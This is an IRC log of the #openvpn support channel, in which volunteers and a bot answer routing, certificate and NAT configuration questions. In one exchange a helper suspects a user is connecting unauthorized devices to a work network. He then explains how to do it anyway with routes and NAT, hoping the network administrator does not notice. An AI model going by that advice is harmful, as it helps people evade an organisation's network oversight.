07:50 -!- cosmicgate is now known as asdasdasd 07:56 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 08:03 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 08:06 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-uxbspexqfkwdnydz] has quit [Quit: Planned maintenance, back soon] 08:06 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wznbqzxmeppumdbt] has quit [Quit: Planned maintenance, back soon] 08:34 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 08:40 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 08:43 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 08:45 -!- asdasdasd [~root@216.17.109.26] has quit [Ping timeout: 240 seconds] 08:51 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 08:56 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 08:58 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-jwtrifiamymywmib] has joined #openvpn 08:59 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 09:02 -!- u0m3 [~Radu@92.80.72.203] has quit [Client Quit] 09:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-layqgdbowlknfrko] has joined #openvpn 09:04 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 09:11 -!- blackness [black@vdsl001.client.black.blackmajic.org] has quit [Quit: Leaving] 09:19 -!- u0m3 [~Radu@92.80.72.203] has quit [Read error: Connection reset by peer] 09:22 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 09:59 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 265 seconds] 10:13 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 10:14 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has left #openvpn [] 10:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 10:21 -!- master_of_master [~master_of@p57B54DDA.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:23 -!- master_of_master [~master_of@p57B5338D.dip.t-dialin.net] has joined #openvpn 10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 10:26 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:38 -!- Assid [~kvirc@unaffiliated/assid] has quit [Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/] 10:59 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 11:04 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 11:04 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 11:06 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 11:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 11:22 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 11:29 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 11:36 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 11:42 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 11:47 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 11:54 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 12:05 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 12:11 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 12:14 -!- [1]JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- \o/] 12:15 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 12:15 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 12:18 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 12:21 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 12:48 -!- brute11k1 [~brute11k@89.249.235.33] has joined #openvpn 12:49 -!- brute11k [~brute11k@89.249.235.33] has quit [Ping timeout: 244 seconds] 12:59 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 13:02 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 13:06 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 13:12 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 13:19 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 13:28 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 13:36 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 13:42 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 13:49 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 13:50 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 13:54 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Client Quit] 13:54 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 14:00 -!- ngharo [~ngharo@2001:1af8:4400:a049::] has quit [Ping timeout: 264 seconds] 14:02 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 14:04 -!- brute11k1 [~brute11k@89.249.235.33] has quit [Ping timeout: 252 seconds] 14:06 -!- ngharo [~ngharo@2001:1af8:4400:a049::] has joined #openvpn 14:09 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 14:22 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 14:33 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 14:35 -!- Porkepix_ [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 14:36 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 14:41 -!- brute11k [~brute11k@89.249.230.77] has quit [Quit: Leaving.] 14:52 -!- Porkepix_ is now known as Porkepix 14:57 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 272 seconds] 15:00 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 15:02 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds] 15:06 -!- gladiatr [~usualfrog@openvpn/community/support/gladiatr] has joined #openvpn 15:11 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 15:14 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 15:16 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 15:35 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 15:38 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 15:58 -!- gladiatr [~usualfrog@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 16:06 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 246 seconds] 16:07 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 16:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer] 16:15 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 16:17 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer] 16:18 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 16:18 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Client Quit] 16:50 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 252 seconds] 16:54 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 17:15 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Disconnected by services] 17:17 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 17:17 -!- mode/#openvpn [+o vpnHelper] by ChanServ 17:23 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 17:46 -!- CrashTM [~CrashTM@98.144.34.109] has joined #openvpn 17:54 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 18:18 -!- CrashTM [~CrashTM@98.144.34.109] has quit [Ping timeout: 272 seconds] 18:31 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn 18:39 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Read error: Connection reset by peer] 18:43 -!- Z_Analyzer [~lipalm@173-164-219-57-SFBA.hfc.comcastbusiness.net] has joined #openvpn 18:44 < Z_Analyzer> hello - is there a way to 'suspend', not revoke, a user account (CERT) on the server side ? 19:02 < BtbN> revoke the cert, and later un-revoke it? 19:05 < dioz> lets not split hairs 19:05 < MagisterQuis> Z_Analyzer: If you want to ban for a certain amount of time, use an at job. 19:07 < Z_Analyzer> I'm trying to use a ccd file - that doesn't seem to work ) no idea i could revoke and un-revoke later without sending new keys 19:07 < Z_Analyzer> MagisterQuis, what would you put in the job ? 19:07 < MagisterQuis> Z_Analyzer: The command to unrevoke a cert. 19:08 < MagisterQuis> I have to look it up every time. 19:08 < MagisterQuis> http://blog.abhijeetr.com/2012/06/revokeunrevoke-client-certificate-in.html 19:08 <@vpnHelper> Title: Blog by Abhijeet Rastogi about Linux: Revoke/Unrevoke a client certificate in OpenVPN (at blog.abhijeetr.com) 19:10 < MagisterQuis> Even better http://robert.penz.name/21/ovpncncheck-an-openvpn-tls-verify-script/ 19:10 < Z_Analyzer> yeah i'm checking out the tols-verify thing 19:10 < Z_Analyzer> tls* 19:10 <@vpnHelper> Title: ovpnCNcheck an OpenVPN tls-verify script | Robert Penz Blog (at robert.penz.name) 19:10 < Z_Analyzer> tnx 19:10 < MagisterQuis> Google. 19:10 < MagisterQuis> http://google.com 19:10 <@vpnHelper> Title: Google (at google.com) 19:10 < MagisterQuis> Heh. 19:11 < Z_Analyzer> yeah i saw the revoke part, most FAQs and blogs talk about revoking being final - i was missing the unrevoke link 19:13 <+pekster> Z_Analyzer: Put the 'disable' direcive in a ccd file 19:13 < Z_Analyzer> pekster, i tried, that didn't work 19:16 <+pekster> Hmm, I thought that was valid (trying to confirm now.) You could also use a --client-connect script that simply tests for the $common_name you're interested in and reject it by existing non-zero status 19:17 <+pekster> if ["$common_name" = "invalid X509 CN from your cert"]; then exit 1; fi; exit 0 19:17 <+pekster> Or such 19:17 < MagisterQuis> Neat idea. 19:17 < MagisterQuis> Benefit of that is you could use a database for scalability and to prevent someone trying to read and write a text file simultaneously. 19:21 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:24 -!- Crosshair84 [~Crosshair@200.49.30.11] has joined #openvpn 19:24 < Crosshair84> hello 19:25 < Crosshair84> I need help I want to make a site to site vpn but I have some problems 19:25 < Crosshair84> I don't know what to do 19:26 < Crosshair84> can you helpme? 19:26 <+pekster> Crosshair84: Do you have basic connectivity right now? Until you do you can't proceed further 19:26 < Crosshair84> yes 19:26 < Crosshair84> the client is conected 19:26 < Crosshair84> but 19:26 < Crosshair84> the problem is 19:26 < Crosshair84> from the server lan side I can't reach the client 19:26 < Crosshair84> and viceversa 19:27 <+pekster> You have LANs behind both the server and client? 19:27 <+pekster> Or just one? 19:27 < Crosshair84> yes from both 19:28 <+pekster> You should pick one at a time to get working. We have some handy guides and a flowchart that describes all the steps you need: 19:28 <+pekster> For the LAN behind the sever, see this: 19:28 <+pekster> !serverlan 19:28 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 19:28 <+pekster> For the LAN behind the client: 19:28 <+pekster> !clientlan 19:28 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 19:28 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 19:31 < Crosshair84> ok 19:32 < Crosshair84> !ipfoward 19:33 <+pekster> !ipforward 19:33 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 19:33 <+pekster> (you missed the 'r') 19:34 < Crosshair84> !winipforward 19:34 <@vpnHelper> "winipforward" is http://support.microsoft.com/kb/315236 to enable ip forwarding on windows 19:36 < Crosshair84> I just change in my windows client 19:37 < Crosshair84> I didn't know about the forward in the server and client, I just follow the HOW TO of the openvpn site 19:37 < Crosshair84> !linipforward 19:37 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 19:56 < Crosshair84> pekster, THANK YOU 19:57 < Crosshair84> I think that maybe the problem is the ipforwarding in both client and server 19:57 < Crosshair84> I made the changes in both and I can reach the 2 networks fine 19:58 < Crosshair84> It will be good if you add this information in the HOWTO of the offcial page 20:05 < Z_Analyzer> pekster: i ended up implementing your suggestion - works great 20:05 < Z_Analyzer> tnx 20:23 <+pekster> Z_Analyzer: np. I was busy earlier, but I just tested the 'disable' directive in a ccd file and it works as expected by rejecting the client 20:24 < Z_Analyzer> pekster, no luck for me with that one 20:24 <+pekster> I get this in my server-side log when attempting to connect with a CN of "client" "MULTI: client has been rejected due to 'disable' directive" 20:25 <+pekster> At least under 2.3.0 (I'm not sure when that option was added; you can check your manpage for the "--disable" parameter, which only ever makes sense for a ccd file) 20:25 < Z_Analyzer> pekster, i have 2.1.3 20:25 <+pekster> Ah, that may be too old to support that 20:26 < Z_Analyzer> Disable a particular client (based on the common name) from connecting. Don't use this option to disable a client 20:26 < Z_Analyzer> due to key or password compromise. Use a CRL (certificate revocation list) instead (see the --crl-verify option). 20:26 < Z_Analyzer> all i got about it 20:27 <+pekster> Are you *sure* your ccd file is named properly (no .txt or any suffix to the file) and that it's the correct case on case-sensitive OS? 20:27 <+pekster> verb 5 on the server should at least confirm it finds the ccd file when the client connects 20:27 < Z_Analyzer> i gave the file an extension 20:27 < Z_Analyzer> hm 20:27 <+pekster> You can'd do that 20:27 <+pekster> Unless you actually signed your cert like "MyClient.txt" 20:28 <+pekster> ie: CN=SampleName.txt 20:28 <+pekster> Most people don't do that ;) 20:29 < Z_Analyzer> hmmm that must be it 20:29 < Z_Analyzer> a bit obscure 20:29 <+pekster> Not at all 20:29 <+pekster> Manpage says "OpenVPN will look in this directory for a file having the same name as the client's X509 common name. If a matching file exists, it will be opened and parsed for client-specific configuration options." 20:30 <+pekster> So, if a file does not exist named the same (yes, that's EXACTLY the same) as the client's X509 common name, it will not be parsed 20:30 < Crosshair84> PEKSTER thanks for your help 20:30 <+pekster> Crosshair84: np 20:30 < Crosshair84> good night bye 20:31 -!- Crosshair84 [~Crosshair@200.49.30.11] has quit [] 20:46 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 20:50 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:10 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 22:04 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 22:05 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 23:28 -!- blackness [black@vdsl001.client.black.blackmajic.org] has joined #openvpn --- Day changed Sun Jan 13 2013 00:14 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 264 seconds] 00:22 -!- spricer [mix@anon-163-109.vpn.ipredator.se] has joined #openvpn 00:29 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 00:29 -!- tjz [~tjz@unaffiliated/tjz] has quit [Client Quit] 00:31 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 01:00 -!- mix_ [~mix@192-0-132-186.cpe.teksavvy.com] has joined #openvpn 01:02 -!- spricer [mix@anon-163-109.vpn.ipredator.se] has quit [Ping timeout: 252 seconds] 01:26 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 01:28 < anth0ny> trying to set up a vpn for the first time, connecting to my a server running at my home. I'm having trouble understanding what the role of 'push "dhcp-option DOMAIN yourdomain.com" ' in the standard example server.conf files does. What would my 'yourdomain.com' be? 01:31 <+pekster> anth0ny: You don't need it for a basic setup like that. It's useful in networked domain environments to get DNS suffix search to work with a client's resolver (eg: for an office running a Windows domain.) 01:31 < anth0ny> got it, thanks 01:53 < anth0ny> If I'm trying to set up a VPN to tunnel traffic through my home computer, does that have to be a 'bridged vpn'? 01:54 <+pekster> no, stick with routed 01:54 < anth0ny> yeah? and that will let me access the internet over the VPN? 01:54 <+pekster> See: 01:54 <+pekster> !redirect 01:54 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 01:54 <@vpnHelper> http://ircpimps.org/redirect.png 01:55 < anth0ny> basically, my goal is to have a router running OpenWRT in Canada as an OpenVPN client, so that I can connect to that and tunnel traffic through the VPN to a server running at my home in the US, allowing me to appear to the internet as if I'm in the US 01:56 < anth0ny> does that sound feasible with routed VPN? 01:57 < anth0ny> awesome flow chart 01:57 <+pekster> Yes, there's absolutely no need for bridging in that setup 01:57 <+pekster> !tunortap 01:57 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 01:57 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 01:58 < anth0ny> awesome 01:58 < anth0ny> thanks again 02:12 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 246 seconds] 02:14 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 02:18 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 02:18 -!- brute11k [~brute11k@89.249.230.77] has quit [Read error: Connection reset by peer] 02:18 < anth0ny_> pekster, this diagram you linked as been helping me so much 02:19 < anth0ny_> I've gotten to "Is NAT enabled on the VPN subnet?", not sure how to check that or to do that, any pointers? 02:19 <+pekster> !nat 02:19 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 02:21 < anth0ny_> the fact that you have this down in such an automated fashion is making feel like my questions aren't very original... 02:21 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 02:23 <+pekster> The bot has maybe 100 entries or so for common questions; if people ask it, the bot tends to get an entry added to make the job of voulenteers here easier 02:26 -!- mattock is now known as mattock_afk 02:28 -!- anth0ny__ [~anth0ny@c-67-171-37-67.hsd1.wa.comcast.net] has joined #openvpn 02:28 < anth0ny__> pekster, well, it works, thanks so much for your advice! 02:29 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 255 seconds] 02:30 <+pekster> Glad you got it figured out 02:39 < mix_> Have connected firewall as client to OpenVPN server. Is it possible to conect (using RD) from system behind that firewall (LAN IP address) to system behind OpenVPN server (IP address of VPN range)? 02:41 <+pekster> mix_: So you have basic connectivity between your 2 VPN peers and want to get communication working with LANs behind each? 02:46 < mix_> I think there is explanation for that "site to site VPN". What I am asking can I connect from LAN behind firewall to VPN network directly. 02:47 <+pekster> To the VPN network, or to a client on the LAN behind the opposing VPN peer? 02:48 <+pekster> If you have: [LAN 1] --- [VPN client] -- -- [VPN server] -- [LAN 2] do you want hosts on LAN1 to reach hosts on LAN2? Or just the VPN subnet (in which case LAN2 doesn't even matter) 02:48 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 02:48 < mix_> Yes but client behind the opposing VPN peer already has VPN range address so I do not need to connect ot its LAN address. 02:49 < mix_> yes 02:49 <+pekster> You can't overlap network ranges, if that's what you're doing 02:49 < mix_> LAN 2 does not matter 02:49 <+pekster> The network range for the virutal VPN space can't collide with the LANs addressing scheme 02:50 < mix_> I want this: Or just the VPN subnet (in which case LAN2 doesn't even matter) 02:50 -!- anth0ny__ [~anth0ny@c-67-171-37-67.hsd1.wa.comcast.net] has quit [Ping timeout: 256 seconds] 02:50 <+pekster> How do the clients "behind" the VPN client "already have" a VPN network IP? You can't do that 02:50 <+pekster> You need to route traffic between uniquely numbered networks to do that 02:51 <+pekster> Maybe this will explain a bit better: 02:51 <+pekster> !clientlan 02:51 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 02:51 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 02:52 < mix_> Let me try to explain it better if I can :) 02:54 <+pekster> Sure. And if you have a VPn set up already with basic connectivity between your VPN server & client, posting your server config to a pastebin site might help too. Add your LAN network info (network range and default gateway, along with the client's IP on that network) and it should help paint a clearer picture of what you have to work with 02:55 < mix_> I am road warrior which connects to server and than I am able to RD to another machine on that network (VPN network) (both ways). That works as a charm. 02:56 < mix_> road warrior from windows system... 02:57 < mix_> In meantime I installed pf sense and used same client configuration to connect to server which works also fine 02:59 <+pekster> To get bi-directional connectivity with clients behind your VPN client (be it pfSense or whatever else) you need to follow that !clientlan posting the bot gave you 02:59 < mix_> so my question is can I connect system behind pfsense (routing!?) to VPN Network that pf sense is connected to? 02:59 <+pekster> Right, see the !clientlan output from above 03:00 <+pekster> This requires supporting changes on both the client LAN and server-side LAN, in addition to making OpenVPN at both peers aware of the networks accessible through the VPN link 03:00 <+pekster> The flowchart explains all the OpenVPN and routing steps required 03:03 < mix_> "and server-side LAN" ....even if I do not connect to that LAN? 03:03 < mix_> I am connecting to VPN address... 03:04 <+pekster> In order to get packetsk *back* to the client LAN the server-side routing infrastructure (your gateways and such there) need routes 03:04 <+pekster> packets* 03:04 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 03:04 <+pekster> So, if your LAN is, f.eg. 192.168.0.0/24 and the VPN is 10.8.0.0/24, with a server-LAN of 10.20.30.0/24, when a system on 10.20.30.x wants to send return traffic to 192.168.0.x, it needs a way to route back there 03:05 <+pekster> So yes, your *server*-side LAN needs a route *back* to your client-side LAN addressing 03:05 <+pekster> Or you can NAT stuff, but if you don't control the server-side VPN or network infrastructure, I suspect you're asking for help doing something you're not supposed to be doing 03:06 <+pekster> (in which case just add routes for the server-side LAN to your clienet LAN's gateway and SNAT traffic that goes across the link. And hope your netadmin doesn't find out what you're doing) 03:07 <+pekster> For a less theoretical discussion of your problem, I need to see some configuration files and network setup 03:07 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:07 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 03:08 < mix_> configuration is very simple 03:08 < mix_> http://pastebin.com/WqYSddbw 03:08 < mix_> this is client side 03:08 < mix_> I wasn hoping that PF sense could handle routing to/from VPN network 03:08 <+pekster> That doesn't help. What I really want is server-side configuration 03:09 <+pekster> I'm beginning to suspect you don't have access to that and aren't supposed to be connecting client-side devices to your corporate network 03:10 <+pekster> If you wish to break the rules anyway, do what I said above: add routes on your LAN's default gateway to send traffic bound for the server-side network ranges to your LAN's VPN client IP, and perform NAT to masquerade the entire client LAN. And be prepared to face whatever problems that causes you if clever people at the office see what you've done (it's a lot easier than you think to spot this kind of thing) 03:11 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:12 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 03:13 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 03:17 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:17 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 03:19 < mix_> huh it took me a while to pull conf 03:19 < mix_> http://pastebin.com/qpxBCfG3 03:20 <+pekster> Does your ccd setup push a route to 192.168.10.1 or a network encompasing it? 03:21 <+pekster> If not, sending the connecting clients a DNS entry to that IP is worthless, and not going to work since client's can't reach it 03:22 <+pekster> In order to route to a client LAN, you need a route to the client LAN in your server config, you need an iroute in that client's ccd entry for that network, and your server-side LAN environment needs to route packets for the client LAN to your VPN server 03:22 <+pekster> Which is, in fact, all expalined for you in the !clientlan output 03:25 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 03:25 < mix_> I have that iroute LAN 03:26 < mix_> and everything is working great (both ways) 03:26 < mix_> but it seems that only way is "site to site setup" 03:27 < mix_> in CCD I have: ifconfig-push 192.168.13.78 192.168.13.77 03:27 < mix_> iroute 192.168.1.0 255.255.255.0 03:27 < mix_> am I still suspect :) 03:28 <+pekster> The server still needs a standard 'route' entry for that in addition to the iroute 03:28 <+pekster> Did you miss that part of the flowchart? 03:28 < mix_> No I will read that thanks... 03:28 <+pekster> mix_: No, but usually people who try to avoid sharing config files tend to be looking to break rules at thier jobs/networks/providers 03:29 <+pekster> Or are paranoid, in which case they shouldn't be taking advice for free on the Internet ;) 03:30 <+pekster> Also, that DNS option is still worthless since you aren't actually routing clients to that IP 03:31 < mix_> sigh... it is 4.30 here, I have like 30tabs open 5 conf files and had to disable everything on pfsense before I could log to work and pull everything (strip out comments etc) :)) 03:31 <+pekster> Well, I've identified several problems for you, including why your client LAN setup is busted (if you'd read the flowchart when I linked it 40 minutes ago you would already know this) and identified that your DNS server push won't work either 03:32 <+pekster> So, you're probably better off getting some info. One would hope 03:32 < mix_> You are right for DNS - leftover when I was testing dns in that network 03:38 < mix_> txs pekster 03:39 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:39 -!- mix_ [~mix@192-0-132-186.cpe.teksavvy.com] has quit [Quit: Leaving] 03:40 * pekster sighs 03:45 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 04:00 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 04:01 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 04:05 -!- HyperGlide [~HyperGlid@221.237.123.59] has joined #openvpn 04:10 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 04:10 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 04:10 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 04:23 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 04:27 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 04:27 -!- catsup [~d@64.111.123.163] has joined #openvpn 04:34 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 255 seconds] 04:52 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 04:55 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Quit: [self sleep]] 04:59 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 05:02 -!- pelle2 [~p@nl102-232-231.student.uu.se] has quit [Quit: Reconnecting] 05:02 -!- pelle2 [~p@178-132-78-93.cust.azirevpn.net] has joined #openvpn 05:12 -!- Guest55454 [~LaStik@62.109.16.198] has quit [Ping timeout: 240 seconds] 05:43 -!- LaStik [~LaStik@62.109.16.198] has joined #openvpn 05:44 -!- LaStik is now known as Guest19661 07:20 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 248 seconds] 07:45 -!- 